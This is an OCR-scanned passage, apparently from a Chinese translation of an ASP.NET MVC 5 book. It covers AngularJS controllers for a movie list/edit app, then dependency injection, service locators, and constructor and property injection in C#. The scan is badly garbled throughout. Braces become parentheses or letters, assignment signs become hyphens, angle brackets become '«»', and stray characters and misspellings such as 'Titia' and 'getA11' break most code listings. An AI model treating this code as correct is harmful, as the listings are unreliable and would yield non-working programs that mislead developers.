意 ng-include 指 令 的 单 引 用 值 。 单 引用 能 够 确保 视图 路 径 被 按照 字符 串 字 面值 解析 ， 否则， 
Angular 会 认为 其 中 的 文本 是 一 个 表达 式 ， 并 试图 去 查找 模型 上 的 信息 ， 而 不 直接 使 用 字符 
串 字面 值 。 在 控制 器 范围 内 ，create 方 法 需要 能 够 访问 editmorvie 属 性 。 


(function(app) ( 


Hi 


var ListController = function($scope, movieService) ( 


movieService 
-getA11() 
.success (function (data) ( 
$scope.movies = data; 
); 


$scope.create - function() ( 
$scope.edit - ( 
movie: ( 
Titia: "", 
Runtime: 0, 
ReleaseYear: new Date().getFullYear() 


}; 
n 


$scope.delete = function(movie) ( 
movieService.delete (movie) 
-Ssuccess(function() ( 
removeMovieById (movie.Id); 


var removeMovieById - function(id) ( 
for (var i = 0; i < $scope.movies.length; i++) ( 


if ($scope.movies[i].Id == id) ( 
$scope.movies.splice(i, 1); 
break; 
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app.controller("ListController", ListController); 


) (angular.module ("atTheMovies"))); 
同样 ， 详 细 视 图 也 包含 编辑 视图 和 一 个 可 单 击 的 按钮 ， 以 便 用 户 进入 编辑 模式 。 


«div ng-controller-"DetailsController"» 
«h2»((movie.Title))«/h2» 
«div» 
Released in ((movie.ReleaseYear]]. 
«/div» 
«div» 
((movie.Runtime)) minutes long. 
«/div» 
<button ng-click-"edit () "»Edit«/button» 
«div ng-include-"'/Client/views/edit.html'"»«/div» 
«/div» 


DetailsController 需 要 使 当前 的 电影 可 编辑 。 
(function(app) ( 


var DetailsController - function( 
$scope, $routeParams, movieService) ( 


var id - $routeParams.id; 
movieService 
-getById(id) 
.success (function (data) ( 
$scope.movie = data; 
); 


$scope.edit = function () ( 
$scope.edit.movie = angular.copy ($scope.movie); 
}; 
N 


app.controller("DetailsController", DetailsController); 


) (angular.module ("atTheMovies"))); 


注意 ， 正 在 编辑 的 电影 只 是 当前 详细 电影 的 一 个 副本 。 如 果 用 户 取消 编辑 操作 ， 代 码 
不 需要 撤销 修改 ， 只 需要 丢掉 副本 。 如 果 用 户 成 功 保存 编辑 ， 代 码 就 会 用 更 新 的 信息 覆盖 
原始 的 电影 对 象 。 复 制 操作 由 EditController 自 己 负责 。 


(function(app) { 


var EditController = function($scope, movieService) { 
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$scope.isEditable = function() ( 
return $scope.edit && $scope.edit.movie; 
] 


$scope.cancel = function() ( 
$scope.edit.movie - null; 
i 


$scope.save = function() ( 
if ($scope.edit.movie.Id) ( 
updateMovie(); 
) else ( 
createMovie(); 


n 


var updateMovie - function() ( 
movieService.update ($scope.edit.movie) 
.success(function() ( 
angular.extend($scope.movie, $scope.edit.movie); 
$scope.edit.movie - null; 


u 


var createMovie - function() ( 
movieService.create ($scope.edit.movie) 
.success (function (movie) ( 
$scope.movies.push (movie); 
$scope.edit.movie - null; 
n; 
n 
}; 


app.controller ("EditController", EditController); 


} (angular.module ("atTheMovies"))); 
上 面 实现 EditController 的 文件 需要 被 包含 在 加 载 Index.cshtml 的 脚本 中 ,具体 代码 如 下 : 


(section scriptst{ 
«script src-"-/Scripts/angular.js"»«/script» 
«script src /Scripts/angular-route.js"»«/script» 
«script src /Client/Scripts/atTheMovies.js"»«/script» 
«script src /Client/Scripts/MovieService.js"»«/script» 
«script src /Client/Scripts/ListController.js"»«/script» 
«script src /Client/Scripts/DetailsController.js"»«/script» 
«script /Client/Scripts/EditController.js"»«/script» 


t 
«div ng-app-"atTheMovies"» 
«ng-view»«/ng-view» 


</div> 
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注意 


， 在 控制 器 中 ， 当 $scope 的 editmovie 属 性 返回 true 时 ， 控 制 器 中 的 isEditable 属 性 


是 如 何 打 开 视 图 的 。 此 外 ，EditController 是 如 何 访问 editmovie 属 性 的 ， 难 道 edit 属 性 只 能 


在 列表 和 


详细 控制 器 中 访问 ? 


答案 是 可 以 访问 可 编辑 的 电影 ， 这 个 特性 在 Angular 中 是 非常 重要 的 。 和 凭借 JavaScript 


原型 引用 ， 


控制 器 中 的 $scope 对 象 继承 自 父 控制 器 的 $scope 对 象 。 由 于 EditController 嵌 在 


ListController 和 DetailsController 中 ， 因 此 ，EditController 可 以 访问 父 控制 器 的 所 有 $scope 


属性 。 


EditController 使 用 这 个 特性 ， 在 创建 电影 时 ， 向 电影 数组 中 添加 新 电影 ， 当 通过 
angular.extend 更 新 电影 时 ， 复 制 属性 到 已 有 的 电影 。 如 果 觉 得 这 样 会 使 编辑 电影 的 代码 和 
父 控制 器 高 度 耦 合 ， 可 以 选择 使 用 Sscope.emit 抛 出 事件 ， 以 便 其 他 控制 器 自己 处 理 更 新 和 


保存 功能 


12.4 


小 结 


本 章 简要 介绍 了 AngularJS 的 一 些 基 本 功能 ， 并 利用 这 些 功 能 实现 了 一 个 罗列 、 创 建 、 
删除 和 更 新 电影 的 页 面 。 本 章 内 容 还 涉及 数据 绑 定 、 控 制 器 、 模 型 、 视 图 、 服 务 和 路 由 等 。 
此 外 , Angular 还 包括 许多 其 他 本 章 没有 讲 到 的 功能 , 其 中 包括 简易 的 单元 测试 、 集 成 测试 、 
验证 、 定 位 等 。 通 过 第 三 方 插件 ， 我 们 能 找到 许多 组 件 、 小 工具 和 服务 ， 它 们 提供 的 功能 
从 异步 文件 上 传 到 Twitter Bootstrap 集 成 。 和 希望 本 章 的 内 容 介 绍 能 起 到 抛砖引玉 的 作用 ， 激 
发 我 们 探索 AngularJS 世 界 的 兴趣 。 
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本 章 主要 内 容 

e. 软件 设计 模式 

o 依赖 解析 器 在 MVC 的 用 法 

e 依赖 解析 器 在 Web API 的 用 法 


从 第 3 个 版 本 开始 ，ASPNETMVC 引 入 了 一 个 新 概念 : 依赖 解析 器 (dependency resolver)。 这 
极 大 地 增强 了 应 用 程序 参与 依赖 注入 的 能 力 , 以 更 好 地 在 MVC 使 用 的 服务 和 通常 创建 的 一 些 
类 (如 控制 器 和 视图 页 面 ) 之 间 建 立 依赖 关系 。 

为 更 好 地 理解 依赖 解析 器 的 工作 原理 ， 下 面 首先 定义 一 些 它 所 用 到 的 通用 软件 模式 。 如 
果 已 经 熟悉 了 像 服务 定位 (service location) 和 依赖 注入 这 样 的 设计 模式 ， 那 么 完全 可 以 浏览 其 
至 跳 过 13.1 节 的 内 容 ， 直 接 学 习 13.2 节 “MVC 中 的 依赖 解析 ”。 


13.1 软件 设计 模式 


为 更 好 地 理解 依赖 注入 的 概念 ， 以 及 如 何 将 其 应 用 于 MVC 程 序 中 , 首先 了 解 一 下 软件 设 
计 模式 是 很 有 必要 的 。 软 件 设计 模式 主要 用 来 规范 问题 及 其 解决 方案 的 描述 ， 以 简化 开发 人 
员 对 常见 问题 及 其 对 应 解决 方案 的 标识 与 交流 。 

设计 模式 并 不 是 新 奇 的 发 明 ， 而 是 为 行业 中 常见 的 实践 给 出 一 个 正式 的 名 称 和 定义 。 当 
学 习 一 个 设计 模式 时 ， 我 们 很 有 可 能 意识 到 在 过 去 解决 问题 的 方案 中 使 用 过 它 。 


设计 模式 


模式 和 模式 语言 的 概念 通常 归功 于 Christopher Alexander、Sara Ishikawa 和 Murray 
Silverstein， 他 们 在 1977 年 由 牛津 大 学 出 版 社 出 版 的 4 Pattern Language: Towns, Buildings, and 
Construction 一 书 中 阐述 了 这 一 概念 ， 该 书 从 模式 角度 描绘 了 建筑 和 城市 规划 的 视图 ， 并 利用 
这 一 视图 来 描述 问题 以 及 解决 这 些 问题 的 方法 。 


$8139 依赖 注入 


在 软件 开发 领域 ，Kent Beck 和 Ward Cunningham 最 早 采用 模式 语言 的 思想 ， 并 在 1987 年 的 
OOPSLA 会 议 上 介绍 了 他 们 的 经 验 。 也许 最 早 系统 地 介绍 软件 开发 模式 核心 的 应 该 是 1994 出 版 
的 著作 Design Patterns: Elements of Reusable Object-Oriented Sofiware。 该 书 通 常 被 称 作 “4 人 
组 ”( 或 “GoF”)， 之 所 以 这 样 称呼 ， 是 因为 该 书 的 4 位 作者 : Erich Gamma. Richard Helm, 
Ralph Johnson 和 John Vlissides。 

自 那 以 后 ， 软 件 模式 的 思想 迅速 推广 开 来 ， 大 量 人 员 涌 入 这 一 领域 ， 并 涌现 出 一 批 大 师 
级 的 人 物 ， 如 Martin Fowler、Alan Shalloway 和 James R. Trott 等 。 


13.1.1. 设计 模式 一 一 控制 反 转 模式 
几乎 每 个 人 都 见 过 (或 编写 过 ) 下 面 的 代码 : 


public class EmailService 

í public void SendMessage() { ... } 
AETA class NotificationSystem 

i private EmailService svc; 


public NotificationSystem() 
{ 

Svc = new EmailService(); 
) 


public void InterestingEventHappened() 
t 

Svc.SendMessage () ; 
) 

) 

在 上 面 的 代码 中 ，NotificationSystem 类 依赖 于 EmailService 类 。 当 一 个 组 件 依赖 于 其 他 组 
件 时 ， 我 们 称 其 为 耦合 (coupling)。 在 本 例 中， 通知 系统 (NotificationSystem) 在 其 构造 函数 内 
部 直接 创建 e-mail 服务 的 一 个 实例 ， 换 言 之 ， 通 知 系统 精确 地 知道 创建 和 使 用 了 哪 种 类 型 的 
服务 。 这 种 耦合 表示 了 代码 的 内 部 链接 性 。 一 个 类 知道 与 其 交互 的 类 的 大 量 信息 (正如 上 面 的 
示例 )， 我 们 称 其 为 高 耦合 。 

在 软件 设计 过 程 中 ， 高 耦合 通常 认为 是 软件 设计 的 责任 。 当 一 个 类 精确 地 知道 另 一 个 类 
的 设计 和 实现 时 ， 就 会 增加 软件 修改 的 负担 ， 因 为 修改 一 个 类 很 有 可 能 破坏 依赖 于 它 的 另 一 
个 类 。 

上 面 的 代码 设计 还 存在 一 个 问题 : 当 感 兴趣 的 事件 发 生 时 ， 通 知 系统 如 何 发 送 其 他 类 型 
的 信息 ? 例如 , 系统 管理 员 可 能 想得到 文本 消息 而 不 是 电子 邮件 , 或 者 为 了 方便 以 后 查看 通知 ， 
而 把 每 个 通知 都 记录 在 数据 库 中 。 要 实现 这 些 功 能 ， 我 们 必须 重新 实现 NotificationSystem 类 。 

为 降低 组 件 之 间 的 耦合 程度 ， 一 般 采 取 两 个 独立 但 相关 的 步骤 : 

(1) 在 两 块 代码 之 间 引 入 抽象 层 。 

在 NET 平 台中 , 通常 使 用 接口 (或 抽象 类 ) 来 代表 两 个 类 之 间 的 抽象 层 。 针对 上 面 的 示例 ， 
我 们 可 以 引入 一 个 接口 来 代表 抽象 层 ， 并 确保 编写 的 代码 只 调用 接口 中 的 方法 和 属性 。 这 样 
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一 来 ，NotificationSystem 类 中 的 私有 副本 就 变 成 接口 的 一 个 实例 ， 而 不 再 是 具体 类 型 ， 并 且 
对 其 构造 函数 隐藏 了 实际 类 型 ， 代 码 如 下 所 示 : 


public interface IMessagingService 


t 


void SendMessage(); 
} 


public class EmailService : IMessagingService 
t 

public void SendMessage() { ... } 
} 


public class NotificationSystem 
{ 
private IMessagingService svc; 
public NotificationSystem() 
t 
svc = new EmailService(); 
) 


public void InterestingEventHappened() 
t 
Svc.SendMessage () ; 
} 
} 


(2) 把 选择 抽象 实现 的 责任 移 到 消费 者 类 的 外 部 。 
需要 把 EmailService 类 的 创建 移 到 NotificationSystem 类 的 外 面 。 


把 依赖 的 创建 移 到 使 用 这 些 依赖 的 类 的 外 部 ， 这 称 为 控制 反 转 模式 ， 之 所 
以 这 样 命名 ， 是 因为 反 转 的 是 依赖 的 创建 ， 正 因为 如 此 ， 才 消除 了 消费 者 类 对 
| 依赖 创建 的 控制 。 


控制 反 转 (oC) 模 式 是 抽象 的 ; 它 只 是 表述 应 该 从 消费 者 类 中 移出 依赖 创建 ， 而 没有 表述 
如 何 实现 。 在 下 面 的 章节 中 ， 我 们 将 探讨 用 控制 反 转 模式 实现 责任 转移 的 两 种 常用 方法 : HR 
务 定 位 器 和 依赖 注入 。 


13.1.2 ”设计 模式 一 一 服务 定位 器 


服务 定位 器 模式 是 控制 反 转 模式 的 一 种 实现 方式 ， 它 通过 一 个 称 为 服务 定位 器 的 外 部 组 
件 来 为 需要 依赖 的 组 件 提供 依赖 。 服 务 定位 器 有 时 是 一 个 具体 的 接口 ， 为 特定 服务 提供 强 类 
型 的 请 求 ， 有 时 它 又 可 能 是 一 个 泛 型 类 型 ， 可 以 提供 任意 类 型 的 请 求 服务 。 


1. 强 类 型 服务 定位 器 
对 于 示例 应 用 程序 的 强 类 型 服务 定位 器 可 能 有 如 下 接口 : 
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public interface IServiceLocator 
t 

IMessagingService GetMessagingService(); 
f 


在 本 例 中 ， 当 需要 一 个 实现 了 IMessagingService 接 口 的 对 象 时 ， 我 们 知道 应 该 调 上 
GetMessagingService 方 法 。 该 方法 返回 一 个 IMessagingService 接 口 对 象 ， 因 此 ， 我 们 不 需要 转 
换 结果 的 类 型 。 

上 面 的 示例 是 把 服务 定位 器 作为 一 个 接口 ， 而 不 是 一 个 具体 类 型 。 我 们 的 目标 是 降低 组 
件 之 间 的 耦合 程度 ， 其 中 包括 消费 者 代码 和 服务 定位 器 之 间 的 耦合 。 如 果 消 费 者 代码 实现 了 
IServiceLocator 接 口 ， 就 可 以 在 运行 时 环境 中 选择 合适 的 实现 方式 。 正 如 第 14 章 中 讲解 的 ， 这 
对 单元 测试 具有 非常 重要 的 意义 。 

要 用 强 类 型 服务 定位 器 重新 编写 NotificationSystem 类 ， 代 码 如 下 : 


public class NotificationSystem 
{ 


private IMessagingService svc; 
public NotificationSystem(IServiceLocator locator) 
t 
SVC = locator.GetMessagingService(); 
) 


public void InterestingEventHappened() 
i svc.SendMessage () ; 
) 

上 面 的 代码 假设 创建 NotificationSystem 实 例 的 每 个 人 都 会 访问 服务 定位 器 。 这 样 做 带 来 的 便 
利 是 ， 如 果 应 用 程序 通过 服务 定位 器 创建 NotificationSystem 实 例 ， 那 么 定位 器 将 自身 传递 到 
NotificationSystem 类 的 构造 函数 中 ; 如 果 是 在 服务 定位 器 的 外 部 创建 NotificationSystem 类 的 实例 ， 
还 需要 提供 服务 定位 器 到 NotificationSystem 类 的 实现 ， 以 便服 务 定位 器 找到 它 的 依赖 项 。 

为 什么 要 选择 强 类 型 的 服务 定位 器 呢 ? 答案 是 显而易见 的 : 强 类 型 服务 定位 器 简单 易 
用 ; 它 使 我 们 能 够 精确 地 知道 能 够 从 服务 定位 器 得 到 哪些 服务 (也 许 同样 重要 的 是 ， 知 道 不 能 
得 到 哪些 服务 )。 另 外 ， 如 果 IMessagingService 接 口 的 实现 需要 一 些 参数 ， 那 么 我 们 可 以 直接 
把 它们 作为 GetMessagingService 方 法 调用 的 参数 来 请 求 。 

但 有 时 我 们 有 更 多 的 理由 选择 不 使 用 服务 定位 器 。 首 先 ， 服 务 定位 器 仅 限于 创建 那些 在 
IServiceLocator 接 口 设计 时 已 经 预先 知道 的 类 型 对 象 ， 而 不 能 创建 其 他 类 型 的 对 象 , 其 次 ， 当 
应 用 程序 中 的 服务 数量 增加 时 , 就 不 得 不 持续 地 扩展 IServiceLocator 接 口 的 定义 , 而 这 将 加 重 
应 用 程序 维护 扩展 的 负担 。 


2. 弱 类 型 服务 定位 器 


如 果 在 某 个 具体 应 用 中 ， 强 类 型 服务 定位 器 的 负面 影响 超过 了 它 所 带 来 的 正面 效应 ， 可 
以 考虑 改 用 弱 类 型 服务 定位 器 (weakly-typed service locator)， 代 码 如 下 : 
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public interface IServiceLocator 
t 

object GetService(Type serviceType); 
) 


服务 定位 器 模式 的 这 种 变 体 更 加 灵活 ， 因 为 它 允 许 请 求 任意 的 服务 类 型 。 之 所 以 称 为 弱 
类 型 服务 定位 器 ， 是 因为 它 采 用 Type 类 型 的 参数 ， 并 返回 一 个 非 类 型 化 的 实例 ， 也 就 是 一 个 
Object 类 型 的 对 象 。 显 然 ， 需 要 把 调用 GetService 方 法 返回 的 结果 转换 为 正确 类 型 的 对 象 。 
使 用 弱 类 型 服务 定位 器 的 NotificationSystem 类 的 代码 如 下 所 示 : 


public class NotificationSystem 
t 


private IMessagingService svc; 


public NotificationSystem(IServiceLocator locator) 
t 
svc = (IMessagingService) 


locator.GetService (typeof (IMessagingService)); 
) 


public void InterestingEventHappened() 
t 
svc.SendMessage () ; 
} 
} 


上 面 的 代码 看 上 去 没有 先前 使 用 强 类 型 服务 定位 器 的 代码 简洁 ， 这 主要 是 因为 需要 把 
GetService 方 法 返回 的 结果 转换 为 IMessagingService 接 口 类 型 。 自 从 NET 2.0 引 入 泛 型 以 来 ， 
我 们 就 已 经 包含 了 GetService 方 法 的 一 个 泛 型 版 本 : 


public interface IServiceLocator 

{ 
object GetService(Type serviceType); 
TService GetService«TService»(); 

) 


按照 泛 型 方法 的 约定 ， 它 将 返回 一 个 已 经 转换 为 正确 类 型 的 对 象 ， 注 意 返 回 的 类 型 是 
TService 而 不 是 Object。 这 使 得 NotificationSystem 类 的 代码 变 得 简洁 些 : 


public class NotificationSystem 
t 


private IMessagingService svc; 
public NotificationSystem(IServiceLocator locator) 
t 
svc = locator.GetService«IMessagingService»(); 
} 


public void InterestingEventHappened() 


svc.SendMessage(); 
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为 何 还 要 有 Object 版 本 的 GetService 方 法 ? 

我 们 可 能 会 疑惑 为 什么 在 API 中 还 要 有 GetService 方 法 的 Object 版 本 ， 而 不 是 只 有 泛 型 版 
本 。 由 于 泛 型 版 本 为 我 们 省 去 了 类 型 转换 的 工作 ， 因 此 我 们 应 该 在 尽 可 能 多 的 场合 使 用 它 ， 
不 是 这 样 吗 ? 

在 实际 应 用 中 ， 我 们 会 发 现 并 非 每 个 调用 API 的 消费 者 在 编译 时 都 精确 地 知道 它们 将 要 
调用 的 类 型 。 后 面 会 介绍 一 个 MVC 框 架 试图 创建 控制 器 类 型 的 例子 ， 而 在 这 个 例子 中 , MVC 
知道 控制 器 的 类 型 ， 但 它 只 能 在 运行 时 知道 ， 而 在 编译 时 并 不 知道 (例如 ， 把 对 /Home 的 请 求 
映射 到 HomeController 控 制 器 )。 因 为 泛 型 版 本 的 类 型 参数 不 仅 要 用 来 转换 类 型 ， 还 用 来 指定 
服务 的 类 型 ， 所 以 在 不 使 用 反射 的 情况 下 不 能 调用 服务 定位 器 。 


该 方法 的 负面 影响 是 , 它 强制 IServiceLocator 接 口 必须 实现 两 个 几乎 相同 的 方法 , 而 不 是 
只 实现 一 个 。 这 些 无 谓 的 努力 在 .NET 3.5 中 被 移 除 ， 因 为 3.5 版 本 中 引入 了 一 个 新 特性 ， 扩展 
方法 。 

把 扩展 方法 作为 静态 类 的 静态 方法 来 编写 , 在 它 的 第 一 个 参数 中 利用 特殊 的 this 关 键 字 来 
指定 扩展 方法 要 附加 到 的 类 型 .把 GetService 泛 型 方法 分 割 成 为 扩展 方法 之 后 , 代码 如 下 所 示 : 

public interface IServiceLocator 

t 


object GetService(Type serviceType); 
) 


public static class ServiceLocatorExtensions 
{ 


public static TService GetService«TService» (this IServiceLocator locator 
{ 
return (TService)locator.GetService (typeof (TService)); 
) 
) 


现在 ， 我 们 不 必 再 费 尽 周折 编写 两 个 GetService 方 法 (包括 该 方法 的 泛 型 版 本 )。 只 需要 一 
人 编写 ， 便 可 被 全 世界 的 人 利用 。 


ASP.NET MVC 中 的 扩展 方法 


ASPNET MVC 框 架 充 分 利用 了 扩展 方法 。 大 部 分 用 来 在 视图 中 生成 表单 的 HTML 辅 助 方 
法 都 是 HtmlHelper、AjaxHelper 或 UrlHelper 类 的 扩展 方法 。 当 访问 视图 中 的 Html、Ajax 和 Url 
对 象 时 ， 我 们 能 分 别 得 到 对 应 类 型 的 对 象 。 

ASPNET MVC 中 的 扩展 方法 都 在 各 自 单独 的 名 称 空间 中 (通常 是 System.Web.Mvc. Html 或 
System Web.Mvc.Ajax)e ASPNET MVC 团 队 之 所 以 这 样 做 ， 是 因为 他 们 理解 HTML 生成 器 未 
必 能 精确 匹配 应 用 程序 需要 的 内 容 。 我 们 可 以 根据 自身 需要 ， 编 写 自己 的 HTML 生 成 器 扩 
展 方法 。 如 果 从 web.config 文 件 中 删除 ASPNET MVC 的 名 称 空间 ， 那 么 内 置 的 扩展 方法 将 
不 再 显示 ， 而 允许 只 显示 自 定义 的 扩展 方法 并 消除 ASPNET MVC 中 的 相应 方法 。 当 然 , 我 
们 也 可 以 选择 将 二 者 都 显示 出 来 。 将 HIML 生 成 器 作为 扩展 方法 来 编写 使 得 应 用 程序 判别 
更 加 灵活 。 


321 


322 


ASP.NET MVC 5 高 级 编程 (第 5 版 ) 


为 什么 要 选用 弱 类 型 定位 器 呢 ? 因为 它 能 够 弥补 强 类 型 定位 器 带 来 的 负面 影响 ;也 就 是 
说 ， 我 们 可 以 在 预先 不 知道 的 情况 下 ， 得 到 一 个 可 用 来 创建 任意 类 型 的 接口 。 因 为 该 接口 不 
会 经 常 发 生变 化 ， 所 以 弱 类 型 定位 器 的 使 用 可 以 减轻 应 用 程序 的 维护 负担 。 

另 一 方面 ， 弱 类 型 定位 器 接口 没有 提供 任何 有 关 可 能 被 请 求 的 服务 的 类 型 信息 ， 也 没有 
提供 创建 自 定义 服务 的 简单 方法 。 尽 管 可 以 添加 任意 可 选 对 象 数组 作为 服务 的 “创建 参数 ”， 
但 是 查阅 外 部 文档 是 我 们 知道 服务 需要 哪些 参数 的 仅 有 方式 。 


3. 服务 定位 器 的 利 次 


服务 定位 器 的 用 法 比较 简单 : 我 们 先 从 某 个 地 方 得 到 服务 定位 器 ， 然 后 利用 定位 器 查找 
依赖 。 我 们 可 能 在 一 个 已 知 的 (全 局 ) 位 置 找到 服务 定位 器 ， 或 者 通过 我 们 的 创建 者 获得 服务 
定位 器 。 尽 管 依赖 关系 有 时 会 发 生 改 变 ， 但 签名 不 会 改变 ， 因 为 查找 依赖 唯一 需要 的 就 是 定 
位 器 。 

持久 签名 带 来 好 处 的 同时 ， 也 带 来 了 弊端 。 它 导致 了 组 件 需求 的 不 透明 性 : 使 用 组 件 的 
开发 人 员 通 过 查看 构造 函数 的 签名 不 能 知道 服务 要 求 的 是 什么 ， 这 使 得 他 们 不 得 不 查看 那些 
可 能 过 期 的 文档 ， 或 者 干脆 传递 一 个 空 服务 定位 器 来 查看 我 们 请 求 的 内 容 。 

需求 的 不 透明 性 促使 我 们 选择 下 一 个 反 转 控制 模式 : 依赖 注入 。 


13.1.3 ”设计 模式 一 一 依赖 注入 


依赖 注入 (Dependency Injection"，DD 是 另 一 种 控制 反 转 模式 的 形式 ， 它 没有 像 服务 定位 
器 一 样 的 中 间 对 象 。 相 反 ， 组 件 以 一 种 允许 依赖 的 方式 来 编号， 通常 由 构造 函数 参数 或 属性 
设置 器 来 显 式 表示 。 

选择 依赖 注入 而 不 选择 服务 定位 器 的 开发 人 员 往 往 都 决定 选择 需求 的 透明 性 。 正 如 下 一 
章 所 介绍 的 ， 选 择 依赖 注入 的 透明 性 在 单元 测试 阶段 具有 显著 优势 。 

1. 构造 函数 注入 

依赖 注入 的 最 常见 形式 是 构造 函数 注入 (constructor injection)。 该 项 技术 需要 我 们 为 类 创 
建 一 个 显 式 表示 所 有 依赖 的 构造 函数 ， 而 不 是 像 先 前 服务 定位 器 的 例子 一 样 ， 构 造 函数 把 服 
务 定 位 器 作为 它 仅 有 的 参数 。 

如 果 采 用 构造 函数 注入 ，NotificationSystem 类 的 代码 将 如 下 所 示 : 


public class NotificationSystem 
t 


private IMessagingService svc; 


public NotificationSystem(IMessagingService service) 
j| 

this.svc = service; 
} 


public void InterestingEventHappened() 
{ 
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svc.SendMessage(); 
} 
) 


这 段 代 码 的 一 个 显著 优点 是 ， 它 极 大 地 简化 了 构造 函数 的 实现 。 组 件 总 是 期 望 创 建 它 的 
类 能 够 传递 需要 的 依赖 。 而 它 只 需要 存储 IMessagingService 接 口 的 实例 以 便 之 后 使 用 。 

另外 ,这 段 代码 减少 了 NotificationSystem 类 需要 知道 的 信息 量 ,在 以 前 , NotificationSystem 
类 既 要 知道 服务 定位 器 ， 也 需要 知道 它 自己 的 依赖 项 ， 而 现在 只 需要 知道 它 自己 的 依赖 项 就 
f. 

第 三 个 优点 ， 正 如 上 面 提 到 的 ， 就 是 需求 的 透明 性 。 任 何 想 创建 NotificationSystem 类 实 
例 的 代码 都 能 查看 构造 函数 ， 并 精确 地 知道 哪些 内 容 是 使 用 NotificationSystem 类 必须 的 。 而 
使 用 服务 定位 器 既 不 需要 猜测 ， 也 不 需要 拐弯 抹 角 。 


2. 属性 注入 
属性 注入 (property injection) 是 一 种 不 太 常见 的 依赖 注入 方式 。 顾 名 思 义 ， 该 方式 是 通过 


设置 对 象 上 的 公共 属性 而 不 是 通过 使 用 构造 函数 参数 来 注入 依赖 的 。 
如 果 采 用 属性 注入 ，NotificationSystem 类 的 代码 将 如 下 所 示 : 


public class NotificationSystem 
{ 


public IMessagingService MessagingService 
t 

get; 

set; 
} 


public void InterestingEventHappened() 
{ 
MessagingService.SendMessage(); 
) 
) 


上 面 的 代码 删除 了 构造 函数 的 参数 ， 事 实 上 ， 删 除了 整个 构造 函数 ， 取 而 代 之 的 是 一 个 
属性 。 该 类 期 望 任何 消费 者 类 都 通过 属性 (而 非 通过 构造 函数 ) 向 我 们 提供 依赖 。 

上 面 的 InterestingEventHappened 方 法 现在 有 点 危险 ， 可 能 会 产生 异常 。 由 于 它 假定 服务 
依赖 已 经 被 提供 ;而 在 它 被 调用 时 ， 如 果 没 有 提供 服务 依赖 ， 那 么 它 将 抛 出 一 个 
NullReferenceException5t 5 . 鉴于 以 上 问题 , 我 们 应 该 更 新 InterestingEventHappened 方 法 以 确 
保 在 使 用 服务 之 前 已 提供 了 服务 依赖 : 


public void InterestingEventHappened() 
t 


if (MessagingService -- null) 
{ 
throw new InvalidOperationException( 
"Please set MessagingService before calling " + 
"InterestingEventHappened()." 
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) 
MessagingService.SendMessage(); 
} 


显而易见 ， 这 里 我 们 已 经 稍微 减少 了 需求 的 透明 性 ;尽管 相对 于 服务 定位 器 而 言 ， 它 还 
算 透 明 ， 但 是 它 绝 对 比 构造 函数 注入 更 容易 产生 错误 。 
既然 属性 注入 降低 了 透明 性 ， 那 么 开发 人 员 为 什么 仍然 选择 属性 注入 而 不 选择 构造 函数 
注入 呢 ? 究 其 原因 ， 主 要 有 两 点 : 
e 如 果 依 赖 在 某 种 意义 上 是 真正 可 选 的 , 即 在 消费 者 类 不 提供 依赖 时 , 也 有 相应 的 处 理 。 
此 时 ， 属 性 注入 可 能 是 一 个 不 错 的 选择 。 
。 类 的 实例 可 能 需要 在 我 们 还 没有 控制 调用 的 构造 函数 的 情况 下 被 创建 ,这 是 一 个 不 太 
明显 的 原因 。 本 章 后 面 讨论 依赖 注入 如 何 应 用 于 视图 页 面 时 , 会 介绍 若干 类 似 示例 。 
通常 情况 下 ， 开 发 人 员 更 倾向 于 使 用 构造 函数 注入 ， 只 有 当 上 述 情况 出 现时 才 会 使 用 属 
性 注入 。 显 然 ， 我 们 可 在 一 个 对 象 中 使 用 这 两 种 注入 技术 : 类 中 的 强制 性 依赖 作为 构造 函数 
参数 注入 ， 可 选 依赖 作为 属性 注入 。 


3. 依赖 注入 容器 


上 面 两 个 依赖 注入 的 例子 都 遗漏 了 一 个 大 问题 : 依赖 是 如 何 产生 的 ? “把 依赖 作为 构造 
函数 参数 来 编写 ”， 说 起 来 是 一 回 事 , 理解 如 何 完 成 则 是 另 一 回 事 。 尽管 类 的 使 用 者 可 以 手动 
提供 所 有 的 依赖 ， 但 是 随 着 时 间 推 移 这 会 变 成 一 项 很 大 的 负担 。 如 果 整 个 系统 都 支持 依赖 注 
入 ， 那 么 这 意味 着 创建 的 任意 一 个 组 件 都 需要 我 们 知道 如 何 来 满足 每 一 部 分 的 需要 。 

依赖 注入 容器 便 是 使 依赖 解析 变 得 简单 的 一 种 方式 。 依 赖 注入 容器 是 一 个 可 以 作为 组 件 
工厂 使 用 的 软件 库 ， 它 可 以 自动 检测 和 满足 里 面 元 素 的 依赖 需求 。 依 赖 注入 容器 API 的 使 用 
接口 看 起 来 很 像 服务 定位 器 ， 因 为 请 求 其 执行 的 主要 操作 将 根据 类 型 提供 一 些 组 件 。 

当然 ， 它 们 是 有 区 别 的 ， 区 别 在 细节 上 。 服 务 定位 器 的 实现 通常 极其 简单 :我 们 只 需要 
告诉 服务 定位 器 ,“ 如 果 有 人 请 求 这 种 类 型 ， 就 给 它 该 类 型 的 对 象 ”。 服 务 定位 器 很 少 涉及 
要 使 用 对 象 的 实际 创建 过 程 。 另 一 方面 ， 依 赖 注入 容器 经 常 配置 一 些 罗 辑 ， 像 “如 果 有 人 请 
求 这 种 类 型 ， 就 创建 一 个 该 类 型 的 对 象 并 返回 给 请 求 者 ”。 言 下 之 意 ， 该 具体 类 型 的 创建 通常 
会 反 过 来 要 求 其 他 类 型 的 创建 以 满足 它 的 依赖 要 求 。 尽 管 差 别 细微 ， 但 它 却 使 得 服务 定位 器 
和 依赖 注入 容器 的 实际 应 用 产生 了 巨大 差异 。 

所 有 的 依赖 容器 都 或 多 或 少 地 拥有 允许 映射 类 型 (相当 于 说 ,“ 当 有 人 请 求 类 型 TI 时 ， 我 
们 可 以 为 他 创建 一 个 类 型 为 T2 的 对 象 ”) 的 API 配 置 .许多 依赖 容器 也 允许 根据 名 称 来 配置 (“ 当 
有 人 请 求 名 称 为 N1 的 类 型 T1 时 ， 我 们 就 为 他 创建 一 个 类 型 为 T2 的 对 象 ”)。 一 些 人 甚至 尝试 
创建 任意 的 类 型 ， 尽 管 这 些 类 型 没有 被 预先 配置 ， 但 只 要 这 些 请 求 的 类 型 是 具体 的 而 非 抽象 
的 就 可 以 了 。 一 些 依赖 容器 甚至 支持 拦截 (interception) 功 能 , 使 用 该 功能 可 在 类 型 创建 时 或 者 
在 调用 对 象 的 方法 或 属性 时 ， 设 置 等 效 的 事件 处 理 程序 。 

考虑 到 本 书 的 目标 ， 这 些 高 级 特性 用 法 已 经 超出 了 本 书 的 讨论 范围 。 如 果 决 定 使 用 依赖 
